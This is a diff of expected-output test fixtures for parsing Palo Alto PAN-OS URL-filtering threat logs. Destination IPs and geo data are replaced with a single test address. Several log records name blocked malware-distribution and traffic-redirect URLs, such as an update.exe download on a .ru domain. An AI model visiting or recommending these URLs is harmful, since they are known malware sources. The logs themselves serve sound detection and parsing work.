@@ -4722,14 +4692,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545562424Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079192800Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4752,23 +4722,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 22489, + "number": 4837, "organization": { - "name": "Castle Access Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "69.43.161.167" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4784,7 +4756,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -4825,7 +4797,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Jqiwb/u74kolY3Y1yGkp+oMAxT4=", + "community_id": "1:IJvQ8uQdf8IMfv+pa7ougp18GvM=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -4861,14 +4833,14 @@ ], "ip": [ "192.168.0.2", - "69.43.161.167", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545569520Z", - "original": "Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,69.43.161.167,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079214800Z", + "original": "Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:46:47.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4892,22 +4864,24 @@ "nat": {}, "geo": { "continent_name": "Asia", - "country_name": "South Korea", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Korea Republic Of", + "region_name": "Jilin", "location": { - "lon": 126.9741, - "lat": 37.5112 - }, - "country_iso_code": "KR" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 17848, + "number": 4837, "organization": { - "name": "INAMES" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "202.31.187.154" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -4923,7 +4897,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", "panw": { "panos": { "ruleset": "rule1", @@ -4964,7 +4938,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:q84mXt2kLt843wk0Y5vtvJwq+bc=", + "community_id": "1:q2pcfpZcAPG71w/ewi9qWbP1iPo=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -5000,14 +4974,14 @@ ], "ip": [ "192.168.0.2", - "202.31.187.154", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545576669Z", - "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,202.31.187.154,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", + "ingested": "2021-12-09T13:42:59.079220900Z", + "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", "created": "2012-10-30T09:47:02.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5030,23 +5004,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 41126, + "number": 4837, "organization": { - "name": "CJSC Registrar R01" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "89.111.176.67" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5062,7 +5038,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5103,7 +5079,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1jDSU+BTdTOAQSrWGRbSjxehwNg=", + "community_id": "1:nE+H7Z778BIW5nL9ViBz57RhPQI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -5139,14 +5115,14 @@ ], "ip": [ "192.168.0.2", - "89.111.176.67", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545584007Z", - "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,89.111.176.67,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "ingested": "2021-12-09T13:42:59.079226800Z", + "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:47:02.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5169,26 +5145,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5204,7 +5179,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5245,7 +5220,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:vGp9HpobYZmzzLGyDAG6oVAe4dg=", + "community_id": "1:g3JhDl3Gkv1JmUHYgub2bB0hWK4=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -5281,14 +5256,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545591186Z", - "original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079232700Z", + "original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:12.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5311,23 +5286,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.73.210.29" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5343,7 +5320,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5384,7 +5361,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:8JiI5Ka3Oyz6yaLm3xObTqAo/Jw=", + "community_id": "1:46UstfGPWeZVxrzoO9FBbSk5buo=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -5420,14 +5397,14 @@ ], "ip": [ "192.168.0.2", - "208.73.210.29", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545598303Z", - "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079238500Z", + "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:17.000-04:00", "timezone": "America/New_York", "kind": "alert", 
@@ -5450,23 +5427,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.73.210.29" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5482,7 +5461,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5523,7 +5502,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:lOdKYo+aMIHRMMJPawuXy8Bk2I0=", + "community_id": "1:fEjmFv/r7P1mfCuztp/sNazEdmg=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -5559,14 +5538,14 @@ ], "ip": [ "192.168.0.2", - "208.73.210.29", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545605471Z", - "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079244200Z", + "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:17.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5589,26 +5568,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5624,7 +5602,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5665,7 +5643,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:rDRkkTH2aHta89i52OraqG5WcDI=", + "community_id": "1:Itoh3MIE1ST0EL8MzzvZn6JtmTQ=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -5701,14 +5679,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545612531Z", - "original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079250Z", + "original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:51:03.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5731,23 +5709,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 40034, + "number": 4837, "organization": { - "name": "Confluence Networks Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "208.73.210.29" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5763,7 +5743,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5804,7 +5784,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:00fHGTkjtblnJQ9P4Wiw9QuDEpI=", + "community_id": "1:Ys9Ml4mGCmU2eiSE7dR++eJlyOA=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
@@ -5840,14 +5820,14 @@ ], "ip": [ "192.168.0.2", - "208.73.210.29", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545619746Z", - "original": "Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,208.73.210.29,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "ingested": "2021-12-09T13:42:59.079255900Z", + "original": "Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:51:23.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -5870,23 +5850,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Russia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Russian Federation", + "region_name": "Jilin", "location": { - "lon": 37.6068, - "lat": 55.7386 - }, - "country_iso_code": "RU" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 197695, + "number": 4837, "organization": { - "name": "Domain names registrar REG.RU, Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "89.108.64.156" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" 
@@ -5902,7 +5884,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,89.108.64.156,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "panw": { "panos": { "ruleset": "rule1", @@ -5943,7 +5925,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:sQ6YL9T0OZftMg71BK+1IHpXIRM=", + "community_id": "1:zO0hayGDH/CHTey82VssD6lNSiU=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" 
